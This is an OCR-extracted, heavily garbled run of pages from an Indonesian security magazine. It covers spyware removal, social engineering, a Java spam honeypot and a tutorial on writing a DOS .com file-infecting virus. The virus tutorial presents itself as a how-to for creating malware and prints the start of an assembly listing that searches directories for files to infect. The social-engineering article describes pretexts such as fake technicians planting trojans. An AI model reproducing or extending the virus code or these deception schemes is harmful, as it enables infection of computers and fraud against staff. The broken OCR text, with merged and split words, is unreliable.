Namun memang dibutuhkan sebuah VGA card yang cu-kup untu k melihat animasi ini tanpa memberatkan kom -puter. Animasi ini bukan hanya dalam badan programsaja, melainkan di menu HELP-nya digunakan animasi,sehingga sebuah penjelasan mengenai spyware dan peng-gunaan maupun fitur dan tujuan utama program ini dapatdimengerti pengguna tanpa harus membaca keterangandibawahnya. Sangat inovatif dan kreatif.
Databasespyware pro-gram ini bisa diupdate danlengkap untukmencari
spyware danmelindungi darispyware. Me-ngingat bahasanedisi lalu menge-nai BlazzingPerfect
Keylogger, dimana yang sudah canggih untuk dapat dijalankan di komputer korban secara diam-diam dan fire-wall pun dapat di buat lengah olehnya. Tetapi denganZeroSpyware, keylogger tersebut dibuat lemah tak berda-ya, dikarenakan dalam database ZeroSpyware ini t erdapatdata-data mengenai keylogger tersebut.
Langkah pencegahan lainnya yaitu langsung dariwww.sysinternals.com/ntw2k/freeware/procexp.shtmlyang dapat membantu anda memonitor software apa sajayang sedang berjalan di komputer anda. Pembersihan se-cara berkala di registry system, msconfig, startup menujuga membantu anda terhindar dari segala bentuk scumwaredan juga baca-baca tent ang scumware yang terbit setiapharinya di www.cexx.org.
Dan, di www.astalavista.com anda dapat membaca artikeltentang Spyware dan Amerika sebagai negara adidaya na-mun di web ini diterangkan bahwa spammer di negeritersebut memiliki ratting tertinggi di dalam dunia Spam.
Nah, dengan pembahasan tentang scumware ini makasaya harap pembaca dapat lebih bijak dalam surfing ria,
dan dapat menghindari scumware yang mengganggu.
Gambar 4. ZeroSpyware AlertGambar 7. ZeroSpyware mendeteksi BlazzingPerfect Keyloger
Gambar 6. ZeroSpyware menjaga setting browser
Gambar 5. ZeroSpyware Quarantine
Gambar 3. Pencarian scumware dengan menggunakan NoAdware
-
8/9/2019 NeoTek Vol. IV - No. 11
16/48
NeoStart
16 NeoTek Vol. IV No. 11
IASANYA MASYARAKAT AWAM UMUMNYA MENGETA-hui bahwa hacker hanya menggunakan komputerdan internet dalam mem-penetrasi jaringan tar-
getnya. Namun mereka tidak tahu kalau hacker juga meng-gunakan teknik hacking tanpa komputer dan teknologiapapun dalam aksinya.
Social engineering merupakan teknik hacking yang dilaku-kan dengan melihat segi sosial antar hubungan manusia,dan social engineering sendiri melakukan penetr asi pada
sebuah keamanan melalui celah psikologis dari seorang ma-nusia. Biasanya dalam hacking biasa kita menemui sebuahinterface misal saja itu sebuah web, konsol dan lainnya.Dalam social engineering juga t erdapat interface, namundalam hal ini yang dijadikan in terface adalah kary awansebuah perusahaan yang dijadikan target.
Perban dingan Comm on Hack dengan SocialEngineering
Common Hack
Sosial Engineering
Setelah melihat gambaran di atas, dapat dilihat perbedaan
hacking biasa dengan metode social engineering. Dalamsocial engineering sendiri hacker harus pun ya kemampuanbicara yang bagus, karena hanya mengandalkan kemampuanbicara saja untuk mendapatkan kepercayaan.
Contoh-contoh dari social engineering
Tim teknis palsu , berpura-pura sebagai tim teknis yangmenangani kerusakan-kerusakan komputer perusahaan,kemudian memberitahu kepada korban untuk menginstalasisebuah program sebagai patch pada komputer- komputeryang ada. Program ini sudah ditentukan si hacker dan ten-tu saja sebuah malware seperti trojan, keylogger dan lainnya.
Vendor software palsu, berpur a-pura sebagai Person ofContact (PoC) dari program yang digunakan oleh perusa-
haan yang bersangkutan dan mencoba meyakinkan akanmelakukan update, namun sebelumnya terlebih dahulu
meminta akses administr ator, selanjutnya semua jaringanakan berada ditangan.
W ebsite kont es palsu, membuat sebuah web palsu dengancontent informasi sebuah kontes dengan hadiah-hadiahyang menarik, pendaftaran dibuka dan nantinya yangmendaftarkan diri menjadi member. Data-data memberdirangkum dan e-mail berikut password login dicocokkanke account email yang dimiliki oleh member.
Karyawan gadungan, meyakinkan bagian sekuriti (sat-
pam) seakan-akan kehilangan kunci ke ruang kerja danruang komputer, lalu dengan pengaruh tersebut satpamakan membukakan ruang komputer dan ruang kerjanya,selanjutnya aksipun dimulai.
Kelihatannya gampang, namun social engineering meru-pakan teknik hacking yang paling sulit untuk dilakukandan juga sulit untuk ditanggulangi karena tekniknya yangberhadapan dengan korban secara langsung dengan pengaruh-pengaruh yang ditebarkan si hacker susah untuk dilihat.Orang-orang yang telah menyandang predikat socialengineer terbaik adalah Kevin D. Mitn ick, Ira Winkler,dan satu wanita yang bernama Susan Thunder.
Social engineering juga sering dipakai dalam industri
espionage (mata-mata), wanita dalam sosial engineeringlebih diuntungkan dari pria dikarenakan lebih dapat meng-gugah kepercayaan korban dengan segala dayanya.
Dalam melakukan aksinya, social engineer terlebih dahulumengumpulkan data-data yang berhubungan dengan peru-sahaan/lembaga yang dijadikan t erget sebanyak mungkin,ini dimaksudkan untuk mempermudah dalam mempenga-ruhi dan mendapatkan kepercayaan orang-orang dalamperusahaan seperti karyawan, satpam dan lainny a. Namunyang paling sering menjadi korban sosial engineering adalahbagian Hum as dan Call Center sebuah perusahaan, karenabagian-bagian ini bertugas memberi informasi kepadaorang luar yang ingin tahu lebih tentang perusahaannya.
Social engineer yang sukses dapat mengambil informasi-informasi berharga, antara lain yaitu:
? Password user atau administrator.
? Informasi karyawan dan kunci untuk masuk ke dalamperusahaan, terutama ruang penting seperti ruangankomputer.
? Laporan keuangan yang bersifat rahasia.
? Daftar pelanggan dan prospek penjualan perusahaan.
Apabila semua data informasi di atas bocor ke lingkunganluar perusahaan, maka perusahaan akan terancam bang-krut , kesetiaan pelanggan berkurang, dan lain sebagainya.
Untuk menjalani aksinya dalam social engineering maka
perlu dilakukan empat tahapan, yaitu:? Melakukan riset
B
Social EngineeringSocial EngineeringSocial engineering sudah beberapa kali dibahas di majalah ini, tetapi seakan-akan masih kurang
untuk membeberkan informasi mengenai hal yang akan menjadi bahasan kali ini. Andi Ismayadi([email protected]) kembali mengangkat bahasan seputar social engineering demi
memuaskan dahaga pembaca setia NeoTek yang masih penasaran dengan social engineering.
COMPUTER SECURITYCOMPUTER SECURITY
Gambar 1. Common Hack
Gambar 3. Save database
-
8/9/2019 NeoTek Vol. IV - No. 11
17/48
? Membangun kepercayaan
? Mengeksploitasi sebuah hubungan untuk sebuahinformasi melalui kata-kata, aksi atau t eknologi
? Menggunakan informasi yang dikumpulkan un tuktujuan-tujuan berikutnya.
Mengais Inform asi
Seperti yang telah disebut diatas, bahwa social engineerpertama kali kebiasannya adalah mengumpulkan informasi-informasi umu m seputar targetnya. Mencari informasitersebut dapat dengan berbagai cara, antara lain:
Memakai Internet, mencari sumber informasi di internetlebih mudah dibandingkan mencarinya di selembar koran,cukup membuka Google lalu mencari informasi yang berkaitandengan perusahaan yang menjadi target. Atau mencari le-bih detail di www.hoovers.com, finance.yahoo.com, www.sec.gov.
Dumpster Diving/Trashing, dumpster diving adalah tek-nik pencarian informasi perusahaan dari dalam dengancara yang tidak lazim, yaitu mengais di tempat sampahperusahaan. Karena karyawan t idak terlalu memikirkandokumen yang telah mereka simpan sehingga kopiannya
seringkali dibuang begitu saja. Bahaya dari informasiyang bisa diambil, yaitu:
? Daftar nomor telepon intern perusahaan
? Buku pedoman karyawan
? Struktur organisasi
? Daftar password
? Nota rapat
? Laporan-laporan
? Diagram jaringan, dan lainnya
Sistem telepon , social engineer mencari tahu info tentangseorang karyawan hanya dengan mendengar sistem tele-
ponnya, apakah teleponnya menaruh pesan di mailboxatau t idak. Apabila ya, maka social engineer pun tahu ke-mana dan berapa lama si karyawan pergi, agar nantinya iabisa berpura-pura sebagai karyawan ter sebut dalam aksi-nya nanti.
Membangun Kepercayaan
Kepercayaan merupakan kunci utama dalam keberhasilansebuah social engineering, namun kepercayaan adalah halyang susah didapat namun gampang sekali hilang. Biasanyakita hanya mempercayai orang yang sudah kita kenal sebe-lumnya, atau orang yang memang membutuhkan bantuan.Bagaimana social engineer m endapatkan kepercayaan ter -sebut dengan cepat, kita lihat tekniknya yaitu:
Likability , teknik ini dilakukan berdasarkan informasi awaldari hasil mengumpulkan informasi umum mengenai tar-get. Disini, social engineer membangun kepercayaan denganmelihat sisi kesukaan atau ketertarikan korban. Socialengineer akan mengajak korban untuk bertemu dan mulaimembahas tentang kesukaannya, dengan begitu korbanakan mulai menyukai social engineer tersebut, dan darisisi social engineer sendiri ia telah berhasil membangunkepercayaan pada diri korban.
Believability , kemampuan untuk dipercayai korban dengansikap yang baik, sopan dan berpura-pur a sebagai orang pen-ting di perusahaan korban ataupun sebagai orang yang di-kenal korban secara baik ,namun belum pernah bertemu,bisa saja kenalan di chating atau dari program messenger.
Mengeksploit asi Sebuah Hubun gan
Setelah social engineer mendapatkan sebuah kepercayaandari korbannya, langkah selanjutnya adalah mencoba untukmenggali informasi berharga perusahaan dari lingkunganinternal. Apabila di langkah awal telah dilakukan pengum-pulan informasi secara umum atau diluar lingkungan peru-sahaan, maka kali ini mengumpulkannya dari dalam. Socialengineer melakukannya dengan pelan dan hati-hati, kare-na bisa saja nantiny a kepercayaan yang telah didapat akan
hilang begitu saja. Dengan keahlian berbicaranya, socialengineer akan fokus kepada sebuah pembicaraan dengankorban dengan cepat namun tepat sehingga korbanpun akankehilangan konsentrasi berbicara, akibatny a ia akan men -jawab segala pertanyaan yang diajukan social engineer.
Mengeksploitasi sebuah hubungan tidak selalu hanya ber -temu dengan korban secara langsung tatap mu ka. Namunsecara online pun juga bisa mengeksploitasinya, bisa sajasocial engineer dengan kepercayaan yang ia dapat mengi-rimkan email ke korban menyuruhnya untuk melakukanpatch Operating System yang dimiliki dengan sebuah programyang didalamnya terdapat remote control. Ataupun denganmenyisipkan keylogger atau trojan di sebuah gambar ke-luarga. Apapun bisa terjadi setelah kepercayaan didapat.
Pencegahan Social Engineering
Setelah dibahas panjang lebar tent ang social engineering,maka dengan begitu kita perlu mengetahui bahwa bahayayang ditimbulkan bisa lebih besar daripada hacking umumnyayang hanya merusak sebuah sistem jaringan komputer.Social engineering bisa dikatakan ilmu mata-mata, ilmuyang berbahaya yang perlu dipelajari untuk mengetahuikelemahan diri sendiri dan menangkal dari t indakan socialengineering. Berikut beberapa cara pencegahannya.
Dari sisi perusahaan:
? Mengklasifikasi data-data
? Memusnahkan data karyawan dan kontraktor dan
user idnya? Mengganti password secara berkala
? Menangani informasi yang rahasia secara benar
? Mengawal tamu yang berkunjung ke dalam perusahaan
Dari sisi user:
? Meningkatkan kesadaran keamanan dan melatihsebagai investasi bisnis
? Melatih userakan dasar-dasar keamanan agar tetapterjaga keamanan perusahaan.
? Biasakan memusnahkan dokumen-dokumen, jangandibuang tapi di musnahkan, bisa dengan shredder.
? Jangan pernah memberikan password kepada siapapun? Menggun akan password yang berbeda
? Mengganti password secara berkala
? Jangan pernah membuka ataupun mengirim file keatau dari orang asing.
Dengan pencegahan diatas, mudah-mudahan anda dapatterhindar dari social engineering. Dan untuk mengetahuilebih lanjut dan contoh kasus tentang social engineeringanda dapat membaca buku The A rt Of Deception karyaKevin D. Mitnick dan Spies Am ong Uskarya Ira Winkler.Dan jangan samakan sosial engineering dengan Menipukarena berbeda jauh, anggapan ini sering saya dengar. Ja-dikan informasi ini sebagai bahan pelajaran dan tidak di-gunakan untuk hal-hal ilegal. Penulis tidak bertanggungjawab atas penyalahgunaan tulisan ini.
NeoStart
Vol. IV No. 11 NeoTek 17
-
8/9/2019 NeoTek Vol. IV - No. 11
18/48
NeoStart
18 NeoTek Vol. IV No. 11
ITA PARA PENGGUNA KOMPUTER YANG SUDAH AHLI
atau professional maupun para pemula dan semuapenguna komputer tentu sudah tidak asing lagi
dengan istilah virus komputer, atau anda telah menjadikorbannya.
Bagaimana perasaan anda pada waktu anda menjadi kor-ban keganasan virus komputer? Yang saya tahu pasti andakesal, marah, frustasi dan mengutuk para pembuat virus.
Tapi tidak semuanya begitu, ada sekelompok orang yang
senang bila komputernya terkena virus atau mereka se-ngaja memasukkan virus kekomputer mereka, apalagi vi-rus itu jenis baru dan yang pasti lebih berbahaya. Danmereka nantinya akan meneliti virus tersebut lalu dikem-bangkan unt uk dijadikan virus yang lebih berbahaya.
Tapi bagaimana dengan perasaan pembuat virus itu?Apakah senang, bangga atau biasa saja?
Di dalam artikel ini anda akan saya ajak untuk ikut mera-sakan dalam membuat virus komputer, buku ini ditulishanya untuk pembelajaran atau hanya untuk pendidikansemata, dan semuanya saya kembalikan kepada sikap ke-dewasaan anda.
Di artikel ini anda akan diajari cara-cara membuat viru s
komputer dengan bahasa pemrograman tingkat dasar ataubahasa mesin yaitu bahasa pemrograman assembler atauassembling, yang banyak digunakan oleh para pembuatvirus, dikarena ukuran file yang dihasilkan (dibuku in iadalah virus) lebih kecil dibanding dengan bahasa pem-rograman lainnya tanpa mengurangi kemampuannyayang dashyat.
Dan listing virus yang akan saya berikan pada pertemuanini adalah listing virus _468.
Listing virus ini di kembangkan dari virus ALT-11 Magdan diberi nama _468, apa artinya nama itu, yang pastilebih ganas dan bagus, maunya sih.
Keterangan Virus _468
? Tidak menginfeksi command.com
? Pertambahan file .com: xxx byte
? Dapat mencari direktori untuk file yang belum pernahterinfeksi, bila tidak ada akan mencari direktorisebelumn ya, sampai file terinfeksi
? Tidak akan melakukan lagi bila (melakukanpenginfeksian) file yang sudah terinfeksi (setiapberjalan menginfeksi satu)
? Akan mengembalikan atribut asli dari file yangdiinfeksinya dan mengembalikan alur aslinya (originalpath)
? File yang memiliki atribut atau bendera read only(hanya membaca) tetap dapat diinfeksi
Cara mengkompile
tasm /m2 .asm
tlink /t < filename>.obj
Listing virus _468
Ketikan listing virus ini dengan pelan-pelan dan teliti lalusimpan dengan nama _486.Asm atau nama yang lainyang pent ing harus berekstensi Asm (*.Asm), dancompile-lah sesuai cara diatas sehingga dapat membentuksuatu program (virus).
Sekian dulu pertemuan kita pada kali ini, suatu saat ka-lian pasti bertemu denganku pada artikel artikel selan-jutnya, yang pasti tidak kalah menariknya.
Sampai jumpa lagi...
K
Membuat Virus 486Membuat Virus 486Menjadi korban virus mungkin adalah hal yang menyedihkan. Bahasan seputar virus adalah
bahasan yang asyik untuk disimak, telah beberapa kali bahasan virus diangkat di majalah ini.Ade The Teroris memberikan cara membuat virus dengan menggunakan Assembly Language,
yaitu bahasa pemrograman yang populer.
COMPUTER SECURITYCOMPUTER SECURITY
TextBox 1. Script code lengkap dapat ditemukan di lampiran yangdisediakan di dalam CD yang disertakan bersama majalah ini.
.model tiny
.code
org 100h ; melakukan penyesuaian untuk psp
start:
call get_disp ; masukkan ipget_disp:
pop bp
sub bp, offset get_disp ; bp = penggantian ; kode
; label offset asli disimpan
;di dalam kode mesinsave_path:
mov ah , 47h ; simpan cwd
xor dl, dl ; 0 = default drive
lea si, [bp + org_path ]
int 21hget_dta:
mov ah, 2fh
int 21h
mov [bp + old_dta_off], bx ; simpan dta offset tua
set_dta: ; merekam dtamov ah, 1ah
lea dx, [bp + dta_filler]
int 21h
search:
mov ah, 4eh ; temukan file pertamamov cx, [bp + sea rch_attrib] ; jika dta sukse s
diciptakan
lea dx, [bp + search_mask]
int 21h
jnc clear_att rib ;jika ditemuka n, melan jutkanfind_next:
mov ah, 4fh ; ke file berikutnya
int 21h
jnc clear_attrib
still_searching:mov ah, 3bh
lea dx, [bp + previous_dir] ; cd ..
int 21h
-
8/9/2019 NeoTek Vol. IV - No. 11
19/48
NeoTekno
Vol. IV No. 11 NeoTek 19
ACKPOT MERUPAKAN HONEYPOT SMTP RELAY YANGditulis dalam bahasa Java, oleh pembuatnya di-sebut mail swerver (bukan mail server). Jackpot
akan nampak di Internet sebagai open SMTP relay, dandimaksudkan untuk menarik perhatian spammer (danjuga hacker).
Jackpot bisa mengamati spam yang dicatat secara real-time.Kita bisa memeriksa perint ah-perin tah yang dikirim seba-gai spam ke Jackpot, yang mana sulit dilakukan bila kita
hanya mengandalkan spamtrap address. Dengan menja-lankan suatu honeypot relay di komputer kita, kita telahberkontribusi pada perang melawan spam email.
Idealnya, untuk memasang Jackpot, komputer kita terhu-bung ke Intern et dengan alamat IP permanen. Karenaspammer biasanya mengirim bulk mail mereka beberapahari setelah menemukan suatu open relay. Sementara bi-la memakai koneksi dial-up, kali lain ia mencoba mencarikomputer kita mungkin saja kita t idak sedang online ataualamat IP kita mengalami perubahan. Spammer juga akanmengabaikan komputer anda bila ia mengetahui bahwakoneksi anda adalah dial-up.
Instalasi & k onfigur asi
Jackpot ditulis sepenuhnya dalam Java, sehingga di kom-puter kita perlu diinstall dulu Java Runtime Environment(JRE) atau Java Develompment Kit (JDK/ J2SDK) versi 1.3ke atas. Jackpot bisa berjalan pada Windows 2000/XP/NT/98/ME,dan seharusnya berjalan baik juga pada Linux. Perlu di-ingat, Jackpot memakai thread secara intensif, dan hal inibelum tertangani dengan cukup baik oleh Windows 98/ME.
Untuk menginstall software ini, lakukan unzip filejackpot-1.2.2.zip ke suatu folder. Anda akan melihat se-jumlah file konfigurasi di situ. Kita bisa mengedit filejackpot.properties yang merupakan pasangan key/ value,dimana value adalah string yang dipergunakan Jackpotsebagai suatu respon pada perintah-perintah dari spam-mer. Dengan m engubahnya dari konfigurasi default, anda
bisa menyulitkan deteksi fingerprint spammer bahwarelay kita sebenarnya adalah honeypot.
Para pengguna Windows 98, jalankan Jackpot.bat un tukmengaktifkan Jackpot. Sedang pengguna Windows NT/XP/2K,lebih baik memakai shortcut jackpot.run . Dari WindowsExplorer klik kanan file jackpot.run.lnk, edit working fol-der ke tempat dimana anda melakukan unzip Jackpot, dan
ubah ikon ke honey.icodi folder tersebut.
Nant inya jendela con-sole Jackpot akan mem-
punyai ikon honeypotyang cantik tersebutketimbang ikon defaultblack-screen. SetelahJackpot dijalankan, kitabisa mengakses web-server Jackpot (portdefault 8080) untukmemeriksa spam yangditangkap dan menge -lola program Jackpotdengan menggunakanbrowser web ke alamat
http:// servername:port/h tml/, contohhttp://192.168.0.1:8080/html/.
Untuk mengakses layanan administrator, anda memerlu-kan userid dan password yang dapat diubah dari baris be-rikut pada jackpot.properties:
#UserID for access to web-admin
AdminUser=admin
# Password for access to Web-admin
AdminPassword=admin
Nomor port server web tersebut dapat diubah pada barisberikut (default 8080), mengubahnya akan menyulitkanhacker yang melakukan fingerprint:
#Port for serving HTTP; it would be a good idea to change this,
because the# Jackpot server could be fingerprinted by finding it's HTTP
server.
HttpPort=8080
Jangan lupa mengubah variabel Server (default adalahJackpot) yang merupakan header HTTP:
#This entry specifies the value retuned in the "Server: " HTTP
header returned
#by Jackpot. By default, Jackpot claims to be "Jackpot" (with
the current version numb er).
ServerHeader=
Anda bisa melakukan aksi tarpit alias memperlambatkoneksi spammer dengan mengubah baris berikut:
# Extra time taken to respon d to commands when in a sp amrun.
#This is applied to every line entered in a HELO dioalog; the
Anti-Spam Berbasis JavaAnti-Spam Berbasis JavaPemanfaatan honeypot untuk menjebak hacker menjadikan honeypot sebuah pilihan yang
tepat saat ini untuk menciptakan keamanan sistem yang anda miliki. Untuk melengkapi bahasanmengenai honeypot, Firrar Utdirartatmo ([email protected]) kembali membahas mengenai
honepot dengan membuat Jackpot honeypot Anti-Spam berbasis Java.
HONEYPOTHONEYPOT
J
Gambar 1.
Hasil unzipJackpot
Gambar 2. Properties shortcut Jackpot
-
8/9/2019 NeoTek Vol. IV - No. 11
20/48
-
8/9/2019 NeoTek Vol. IV - No. 11
21/48
NeoTekno
Vol. IV No. 11 NeoTek 21
Nampak aktivitas akses ke HTTP juga dicatat:
03/ 11/ 08 05:55:55 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /html HTTP/1.1
03/ 11/ 08 05:55:59 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /htm l/ HTTP/1.1
03/ 11/ 08 05:55:59 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /h tml/ jackpot .css HTTP/1 .1
03/ 11/ 08 05:56:29 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /h tml/ hos ts.htm l HTTP/1 .103/ 11/ 08 05:56:43 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /h tml/ hos ts/ NEWBIE.htm l HTTP/1.1
03/ 11/ 08 05:56:55 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /h tml/ hos ts.htm l HTTP/1 .1
03/ 11/ 08 05:5 6:57 GMT HTTP 192 .168.0.1 192 .168.0 .1
GET /h tml/ hos ts/ NEWBIE.htm l HTTP/1.1
03/ 11/ 08 05:56:59 GMT HTTP 192 .168.0.1 192 .168.0.1
GET /html/messages/C0A80001-3E67150F
File jackpot.log menyimpan log lengkap baik dari SMTPserver maupun HTTP server:
Untuk melakukan pengelo-laan Jackpot, mulailah kehalaman awal, dan pilihAdminister Jackpot. Di sinianda harus memasukkanusername dan password,kalau anda belum mengu-bah file jackpot.propertiesmaka defaultnya adalahadmin.
Catatan: Untuk keamanananda, bila Jackpot dipergu -nakan di dunia nyata, anda
bisa matikan dulu service HTTP, agar tidak bisa diakses
web browser dari luar. Nanti saat anda perlukan untuk
analisa atau pengelolaan, bisa anda aktifkan lagi. Baris difile jackpot.properties yang berkaitan:
#Whether to start the HTTP service.
StartupHttp=yes
Penjelasan: pr oxy spam dan r elay spam
Open proxy merupakan cara yang menarik bagi spammerunt uk mengirimkan mail. Open proxy adalah proxy yang
memungkinkan orang melakukan koneksi ke sistem lain-nya, tanpa perlu autent ifikasi (misal dengan password).
Proxy t idak melakukan store-and-forward, seperti yangdilakukan mail-relay; tetapi perintah akan dikirim lang-sung ke sistem target. Proxy tidak menambahkan infor-masi tracing ke "benda" yang dikirimnya, tetapi meme-lihara log lokal, dan meneruskannya tanpa perubahan.Satu-satunya cara untuk menemukan penyalahgunaanopen proxy adalah dengan melihat log proxy. M eski me-ngundang masalah, masih banyak pihak yang gemar me-ngaktifkan open proxy, misal sejumlah website advertising.
Kebanyakan SMTP server (yang dikonfigurasi dengan tepat)hanya menerima mail message yang memenuhi dua syarat:
? Message dikirim oleh user domain yang menjaditanggungjawab mail server
? Message ditujukan pada user dalam domain tersebut.
Dengan diperkenalkannya Domain Name System (DNS),mail server sering menerima mail dari siapa saja, untuksiapa saja; server akan melakukan usaha t erbaik untu k re-lay mail ke mail-server dari mail-domain bersangkutan(bisa dengan meneruskan message ke mail-server lainnya).Server semacam itu disebut sebagai open relay .
Spammer menyalahgunakan open relay yang ditemukandengan melakukan spam melaluinya. Dengan mengala-matkan setiap message ke sejumlah besar